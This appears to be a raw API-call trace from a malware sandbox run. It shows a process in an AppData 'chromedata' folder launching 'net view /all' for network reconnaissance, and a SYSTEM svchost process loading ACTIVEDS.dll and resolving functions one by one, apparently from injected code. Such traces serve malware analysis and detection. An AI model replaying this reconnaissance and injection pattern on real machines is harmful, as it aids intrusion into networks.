	[0239.231] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11
	[0239.231] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12
	[0239.231] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13
	[0239.231] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13
	[0239.231] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13
	[0239.231] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13
	[0239.231] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13
	[0239.231] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13
	[0239.231] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13
	[0239.231] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13
	[0239.231] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13
	[0239.231] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13
	[0239.231] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13
	[0239.231] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16
	[0239.232] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16
	[0239.232] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17
	[0239.232] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17
	[0239.232] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18
	[0239.232] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18
	[0239.232] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18
	[0239.232] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20
	[0239.232] _wcsnicmp (_String1="COPYCMD", _String2="windows", _MaxCount=0x7) returned -20
	[0239.232] _wcsnicmp (_String1="COPYCMD", _String2="windows", _MaxCount=0x7) returned -20
	[0239.232] GetProcessHeap () returned 0x240000
	[0239.232] HeapFree (in: hHeap=0x240000, dwFlags=0x0, lpMem=0x252fb0 | out: hHeap=0x240000) returned 1
	[0239.232] GetProcessHeap () returned 0x240000
	[0239.232] RtlAllocateHeap (HeapHandle=0x240000, Flags=0x8, Size=0xa) returned 0x24d558
	[0239.232] lstrcmpW (lpString1="\\net.exe", lpString2="\\XCOPY.EXE") returned -1
	[0239.233] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\net.exe", lpCommandLine="net  view /all", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata", lpStartupInfo=0x1fef38*(cb=0x48, lpReserved=0x0, lpDesktop="winsta0\\default", lpTitle="net  view /all", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x1fef84 | out: lpCommandLine="net  view /all", lpProcessInformation=0x1fef84*(hProcess=0x50, hThread=0x4c, dwProcessId=0x950, dwThreadId=0x4b0)) returned 1
	[0239.237] CloseHandle (hObject=0x4c) returned 1
	[0239.237] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1
	[0239.237] GetProcessHeap () returned 0x240000
	[0239.237] HeapFree (in: hHeap=0x240000, dwFlags=0x0, lpMem=0x251f28 | out: hHeap=0x240000) returned 1
	[0239.237] GetEnvironmentStringsW () returned 0x251f28*
	[0239.237] GetProcessHeap () returned 0x240000
	[0239.237] RtlAllocateHeap (HeapHandle=0x240000, Flags=0x8, Size=0x97c) returned 0x2501f8
	[0239.237] FreeEnvironmentStringsW (penv=0x251f28) returned 1
	[0239.237] WaitForSingleObject (hHandle=0x50, dwMilliseconds=0xffffffff) returned 0x0
	[0256.074] GetExitCodeProcess (in: hProcess=0x50, lpExitCode=0x1fee78 | out: lpExitCode=0x1fee78*=0x2) returned 1
	[0256.074] CloseHandle (hObject=0x50) returned 1
	[0256.074] _vsnwprintf (in: _Buffer=0x1fefc0, _BufferCount=0x13, _Format="%08X", _ArgList=0x1fee84 | out: _Buffer="00000002") returned 8
	[0256.074] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000002") returned 1
	[0256.075] GetProcessHeap () returned 0x240000
	[0256.075] HeapFree (in: hHeap=0x240000, dwFlags=0x0, lpMem=0x2501f8 | out: hHeap=0x240000) returned 1
	[0256.075] GetEnvironmentStringsW () returned 0x252fb0*
	[0256.075] GetProcessHeap () returned 0x240000
	[0256.075] RtlAllocateHeap (HeapHandle=0x240000, Flags=0x8, Size=0x9a2) returned 0x2501f8
	[0256.075] FreeEnvironmentStringsW (penv=0x252fb0) returned 1
	[0256.075] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1
	[0256.075] GetProcessHeap () returned 0x240000
	[0256.075] HeapFree (in: hHeap=0x240000, dwFlags=0x0, lpMem=0x2501f8 | out: hHeap=0x240000) returned 1
	[0256.075] GetEnvironmentStringsW () returned 0x252fb0*
	[0256.075] GetProcessHeap () returned 0x240000
	[0256.075] RtlAllocateHeap (HeapHandle=0x240000, Flags=0x8, Size=0x9a2) returned 0x2501f8
	[0256.075] FreeEnvironmentStringsW (penv=0x252fb0) returned 1
	[0256.075] GetProcessHeap () returned 0x240000
	[0256.075] HeapFree (in: hHeap=0x240000, dwFlags=0x0, lpMem=0x24d558 | out: hHeap=0x240000) returned 1
	[0256.075] DeleteProcThreadAttributeList (in: lpAttributeList=0x1feedc | out: lpAttributeList=0x1feedc) 
	[0256.075] _get_osfhandle (_FileHandle=1) returned 0x158
	[0256.075] SetConsoleMode (hConsoleHandle=0x158, dwMode=0x0) returned 0
	[0256.075] _get_osfhandle (_FileHandle=1) returned 0x158
	[0256.075] GetConsoleMode (in: hConsoleHandle=0x158, lpMode=0x49e141ac | out: lpMode=0x49e141ac) returned 0
	[0256.075] _get_osfhandle (_FileHandle=0) returned 0x15c
	[0256.075] GetConsoleMode (in: hConsoleHandle=0x15c, lpMode=0x49e141b0 | out: lpMode=0x49e141b0) returned 0
	[0256.075] GetConsoleOutputCP () returned 0x1b5
	[0256.075] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x49e14260 | out: lpCPInfo=0x49e14260) returned 1
	[0256.075] SetThreadUILanguage (LangId=0x0) returned 0x409
	[0256.076] exit (_Code=2) 

Process:
	id = "52"
	image_name = "net.exe"
	filename = "c:\\windows\\system32\\net.exe"
	page_root = "0x7ee17740"
	os_pid = "0x950"
	os_integrity_level = "0x2000"
	os_privileges = "0x800000"
	monitor_reason = "child_process"
	parent_id = "51"
	os_parent_pid = "0xbb4"
	cmd_line = "net  view /all"
	cur_dir = "C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\"
	os_username = "ZGW5TDPU\\2XC7u663GxWc"
	bitness = "64"
	os_groups = "ZGW5TDPU\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ece3" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7]


Thread:
	id = 346
	os_tid = 0x4b0


Thread:
	id = 347
	os_tid = 0x5cc


Process:
	id = "53"
	image_name = "svchost.exe"
	filename = "c:\\windows\\system32\\svchost.exe"
	page_root = "0x7ee177a0"
	os_pid = "0x748"
	os_integrity_level = "0x4000"
	os_privileges = "0xe60b1e890"
	monitor_reason = "child_process"
	parent_id = "24"
	os_parent_pid = "0x214"
	cmd_line = "svchost.exe"
	cur_dir = "C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\"
	os_username = "NT AUTHORITY\\SYSTEM"
	bitness = "64"
	os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\BDESVC" [0xa], "NT SERVICE\\BITS" [0xa], "NT SERVICE\\CertPropSvc" [0xa], "NT SERVICE\\EapHost" [0xa], "NT SERVICE\\hkmsvc" [0xa], "NT SERVICE\\IKEEXT" [0xa], "NT SERVICE\\iphlpsvc" [0xe], "NT SERVICE\\LanmanServer" [0xe], "NT SERVICE\\MMCSS" [0xe], "NT SERVICE\\MSiSCSI" [0xa], "NT SERVICE\\RasAuto" [0xa], "NT SERVICE\\RasMan" [0xa], "NT SERVICE\\RemoteAccess" [0xa], "NT SERVICE\\Schedule" [0xe], "NT SERVICE\\SCPolicySvc" [0xa], "NT SERVICE\\SENS" [0xe], "NT SERVICE\\SessionEnv" [0xa], "NT SERVICE\\SharedAccess" [0xa], "NT SERVICE\\ShellHWDetection" [0xe], "NT SERVICE\\wercplsupport" [0xa], "NT SERVICE\\Winmgmt" [0xe], "NT SERVICE\\wuauserv" [0xe], "NT AUTHORITY\\Logon Session 00000000:0000af54" [0xc0000007], "LOCAL" [0x7], "BUILTIN\\Administrators" [0xe]


Thread:
	id = 350
	os_tid = 0xe20

	[0239.908] ResetEvent (hEvent=0x8) returned 1
	[0239.908] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0239.921] LoadLibraryW (lpLibFileName="ACTIVEDS.dll") returned 0x6eb70000
	[0239.957] ResetEvent (hEvent=0x8) returned 1
	[0239.957] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0239.959] GetProcAddress (hModule=0x6eb70000, lpProcName="ADsOpenObject") returned 0x6eb716e6
	[0239.959] ResetEvent (hEvent=0x8) returned 1
	[0239.959] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0239.962] LoadLibraryW (lpLibFileName="KERNEL32.dll") returned 0x76b10000
	[0239.962] ResetEvent (hEvent=0x8) returned 1
	[0239.962] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0239.965] GetProcAddress (hModule=0x76b10000, lpProcName="CreateThread") returned 0x76b6375d
	[0239.965] ResetEvent (hEvent=0x8) returned 1
	[0239.965] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0239.968] GetProcAddress (hModule=0x76b10000, lpProcName="DeleteCriticalSection") returned 0x77389ac5
	[0239.968] ResetEvent (hEvent=0x8) returned 1
	[0239.968] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0239.971] GetProcAddress (hModule=0x76b10000, lpProcName="EnterCriticalSection") returned 0x773777a0
	[0239.971] ResetEvent (hEvent=0x8) returned 1
	[0239.971] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0239.973] GetProcAddress (hModule=0x76b10000, lpProcName="GetCurrentProcess") returned 0x76b5cdcf
	[0239.973] ResetEvent (hEvent=0x8) returned 1
	[0239.973] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0239.976] GetProcAddress (hModule=0x76b10000, lpProcName="GetCurrentProcessId") returned 0x76b5cac4
	[0239.976] ResetEvent (hEvent=0x8) returned 1
	[0239.976] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0239.979] GetProcAddress (hModule=0x76b10000, lpProcName="GetCurrentThreadId") returned 0x76b5bb80
	[0239.979] ResetEvent (hEvent=0x8) returned 1
	[0239.979] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0239.982] GetProcAddress (hModule=0x76b10000, lpProcName="GetEnvironmentVariableA") returned 0x76b5ce2e
	[0239.982] ResetEvent (hEvent=0x8) returned 1
	[0239.982] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0239.985] GetProcAddress (hModule=0x76b10000, lpProcName="GetLastError") returned 0x76b5bf00
	[0239.985] ResetEvent (hEvent=0x8) returned 1
	[0239.985] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0239.988] GetProcAddress (hModule=0x76b10000, lpProcName="GetModuleHandleA") returned 0x76b5cf41
	[0239.988] ResetEvent (hEvent=0x8) returned 1
	[0239.988] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0239.990] GetProcAddress (hModule=0x76b10000, lpProcName="GetModuleHandleW") returned 0x76b6374d
	[0239.990] ResetEvent (hEvent=0x8) returned 1
	[0239.990] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0240.047] GetProcAddress (hModule=0x76b10000, lpProcName="GetProcAddress") returned 0x76b633d3
	[0240.047] ResetEvent (hEvent=0x8) returned 1
	[0240.047] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0240.049] GetProcAddress (hModule=0x76b10000, lpProcName="GetProcessHeap") returned 0x76b61280
	[0240.049] ResetEvent (hEvent=0x8) returned 1
	[0240.049] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0240.052] GetProcAddress (hModule=0x76b10000, lpProcName="GetSystemTimeAsFileTime") returned 0x76b62fde
	[0240.052] ResetEvent (hEvent=0x8) returned 1
	[0240.052] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0240.055] GetProcAddress (hModule=0x76b10000, lpProcName="GetTickCount") returned 0x76b5ba60
	[0240.055] ResetEvent (hEvent=0x8) returned 1
	[0240.055] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0240.058] GetProcAddress (hModule=0x76b10000, lpProcName="HeapAlloc") returned 0x77382dd6
	[0240.058] ResetEvent (hEvent=0x8) returned 1
	[0240.058] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0240.060] GetProcAddress (hModule=0x76b10000, lpProcName="HeapFree") returned 0x76b5bbd0
	[0240.060] ResetEvent (hEvent=0x8) returned 1
	[0240.060] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0240.063] GetProcAddress (hModule=0x76b10000, lpProcName="HeapReAlloc") returned 0x7739ff51
	[0240.063] ResetEvent (hEvent=0x8) returned 1
	[0240.063] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0240.066] GetProcAddress (hModule=0x76b10000, lpProcName="InitializeCriticalSection") returned 0x7738a149
	[0240.066] ResetEvent (hEvent=0x8) returned 1
	[0240.066] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0240.069] GetProcAddress (hModule=0x76b10000, lpProcName="IsDBCSLeadByteEx") returned 0x76b74dad
	[0240.069] ResetEvent (hEvent=0x8) returned 1
	[0240.069] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0240.073] GetProcAddress (hModule=0x76b10000, lpProcName="LeaveCriticalSection") returned 0x77377760
	[0240.073] ResetEvent (hEvent=0x8) returned 1
	[0240.073] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0240.075] GetProcAddress (hModule=0x76b10000, lpProcName="MultiByteToWideChar") returned 0x76b6452b
	[0240.075] ResetEvent (hEvent=0x8) returned 1
	[0240.076] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0240.078] GetProcAddress (hModule=0x76b10000, lpProcName="QueryPerformanceCounter") returned 0x76b5bb9f
	[0240.078] ResetEvent (hEvent=0x8) returned 1
	[0240.079] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0240.135] GetProcAddress (hModule=0x76b10000, lpProcName="SetCurrentDirectoryA") returned 0x76b5903d
	[0240.135] ResetEvent (hEvent=0x8) returned 1
	[0240.135] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0240.137] GetProcAddress (hModule=0x76b10000, lpProcName="SetUnhandledExceptionFilter") returned 0x76b63d01
	[0240.137] ResetEvent (hEvent=0x8) returned 1
	[0240.137] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0240.140] GetProcAddress (hModule=0x76b10000, lpProcName="Sleep") returned 0x76b5ba46
	[0240.140] ResetEvent (hEvent=0x8) returned 1
	[0240.140] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0240.143] GetProcAddress (hModule=0x76b10000, lpProcName="TerminateProcess") returned 0x76b52331
	[0240.143] ResetEvent (hEvent=0x8) returned 1
	[0240.143] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0240.146] GetProcAddress (hModule=0x76b10000, lpProcName="TlsGetValue") returned 0x76b5da70
	[0240.146] ResetEvent (hEvent=0x8) returned 1
	[0240.146] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0240.149] GetProcAddress (hModule=0x76b10000, lpProcName="UnhandledExceptionFilter") returned 0x76b6ed38
	[0240.149] ResetEvent (hEvent=0x8) returned 1
	[0240.149] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0240.152] GetProcAddress (hModule=0x76b10000, lpProcName="VirtualProtect") returned 0x76b52341
	[0240.153] ResetEvent (hEvent=0x8) returned 1
	[0240.153] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0240.155] GetProcAddress (hModule=0x76b10000, lpProcName="VirtualQuery") returned 0x76b676d6
	[0240.155] ResetEvent (hEvent=0x8) returned 1
	[0240.155] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0240.158] GetProcAddress (hModule=0x76b10000, lpProcName="WideCharToMultiByte") returned 0x76b6450e
	[0240.158] ResetEvent (hEvent=0x8) returned 1
	[0240.158] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0240.161] LoadLibraryW (lpLibFileName="msvcrt.dll") returned 0x76f80000
	[0240.161] ResetEvent (hEvent=0x8) returned 1
	[0240.161] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0240.163] GetProcAddress (hModule=0x76f80000, lpProcName="__dllonexit") returned 0x76f8f509
	[0240.163] ResetEvent (hEvent=0x8) returned 1
	[0240.163] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0240.166] GetProcAddress (hModule=0x76f80000, lpProcName="__mb_cur_max") returned 0x77023148
	[0240.166] ResetEvent (hEvent=0x8) returned 1
	[0240.166] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0240.228] GetProcAddress (hModule=0x76f80000, lpProcName="_amsg_exit") returned 0x76feb2ef
	[0240.228] ResetEvent (hEvent=0x8) returned 1
	[0240.228] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0240.231] GetProcAddress (hModule=0x76f80000, lpProcName="_errno") returned 0x76f8a5b8
	[0240.231] ResetEvent (hEvent=0x8) returned 1
	[0240.231] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0240.234] GetProcAddress (hModule=0x76f80000, lpProcName="_initterm") returned 0x76f8c151
	[0240.234] ResetEvent (hEvent=0x8) returned 1
	[0240.234] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0240.236] GetProcAddress (hModule=0x76f80000, lpProcName="_iob") returned 0x77022900
	[0240.236] ResetEvent (hEvent=0x8) returned 1
	[0240.236] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0240.239] GetProcAddress (hModule=0x76f80000, lpProcName="_lock") returned 0x76f8a449
	[0240.239] ResetEvent (hEvent=0x8) returned 1
	[0240.239] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0240.242] GetProcAddress (hModule=0x76f80000, lpProcName="_onexit") returned 0x76f9112d
	[0240.242] ResetEvent (hEvent=0x8) returned 1
	[0240.242] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0240.245] GetProcAddress (hModule=0x76f80000, lpProcName="_snwprintf_s") returned 0x76f9141b
	[0240.245] ResetEvent (hEvent=0x8) returned 1
	[0240.245] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0240.248] GetProcAddress (hModule=0x76f80000, lpProcName="calloc") returned 0x76f8c456
	[0240.248] ResetEvent (hEvent=0x8) returned 1
	[0240.248] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0240.250] GetProcAddress (hModule=0x76f80000, lpProcName="fputc") returned 0x76ff87c3
	[0240.250] ResetEvent (hEvent=0x8) returned 1
	[0240.250] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0240.253] GetProcAddress (hModule=0x76f80000, lpProcName="free") returned 0x76f89894
	[0240.253] ResetEvent (hEvent=0x8) returned 1
	[0240.253] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0240.256] GetProcAddress (hModule=0x76f80000, lpProcName="fwrite") returned 0x76f976ac
	[0240.256] ResetEvent (hEvent=0x8) returned 1
	[0240.256] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0240.259] GetProcAddress (hModule=0x76f80000, lpProcName="getenv") returned 0x76f9a419
	[0240.259] ResetEvent (hEvent=0x8) returned 1
	[0240.259] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0240.261] GetProcAddress (hModule=0x76f80000, lpProcName="localeconv") returned 0x76f906a8
	[0240.261] ResetEvent (hEvent=0x8) returned 1
	[0240.261] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0240.272] GetProcAddress (hModule=0x76f80000, lpProcName="malloc") returned 0x76f89cee
	[0240.272] ResetEvent (hEvent=0x8) returned 1
	[0240.272] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0240.275] GetProcAddress (hModule=0x76f80000, lpProcName="memcpy") returned 0x76f89910
	[0240.275] ResetEvent (hEvent=0x8) returned 1
	[0240.275] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0240.278] GetProcAddress (hModule=0x76f80000, lpProcName="memset") returned 0x76f89790
	[0240.278] ResetEvent (hEvent=0x8) returned 1
	[0240.278] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0240.280] GetProcAddress (hModule=0x76f80000, lpProcName="setlocale") returned 0x76f95286
	[0240.280] ResetEvent (hEvent=0x8) returned 1
	[0240.280] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0240.284] GetProcAddress (hModule=0x76f80000, lpProcName="strchr") returned 0x76f8dbeb
	[0240.284] ResetEvent (hEvent=0x8) returned 1
	[0240.284] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0240.286] GetProcAddress (hModule=0x76f80000, lpProcName="strerror") returned 0x76fa7a18
	[0240.286] ResetEvent (hEvent=0x8) returned 1
	[0240.286] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0240.290] GetProcAddress (hModule=0x76f80000, lpProcName="strlen") returned 0x76f943d3
	[0240.290] ResetEvent (hEvent=0x8) returned 1
	[0240.290] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0240.292] GetProcAddress (hModule=0x76f80000, lpProcName="strncmp") returned 0x76f8b443
	[0240.292] ResetEvent (hEvent=0x8) returned 1
	[0240.292] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0240.294] GetProcAddress (hModule=0x76f80000, lpProcName="strncpy") returned 0x76f908a9
	[0240.294] ResetEvent (hEvent=0x8) returned 1
	[0240.294] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0240.296] GetProcAddress (hModule=0x76f80000, lpProcName="strstr") returned 0x76f8de4a
	[0240.296] ResetEvent (hEvent=0x8) returned 1
	[0240.296] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0240.298] GetProcAddress (hModule=0x76f80000, lpProcName="_unlock") returned 0x76f8a42d
	[0240.298] ResetEvent (hEvent=0x8) returned 1
	[0240.298] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0240.299] GetProcAddress (hModule=0x76f80000, lpProcName="abort") returned 0x76fe8e53
	[0240.299] ResetEvent (hEvent=0x8) returned 1
	[0240.299] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0240.301] GetProcAddress (hModule=0x76f80000, lpProcName="atoi") returned 0x76f8dbe0
	[0240.301] ResetEvent (hEvent=0x8) returned 1
	[0240.301] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0240.303] GetProcAddress (hModule=0x76f80000, lpProcName="vfprintf") returned 0x76ff7408
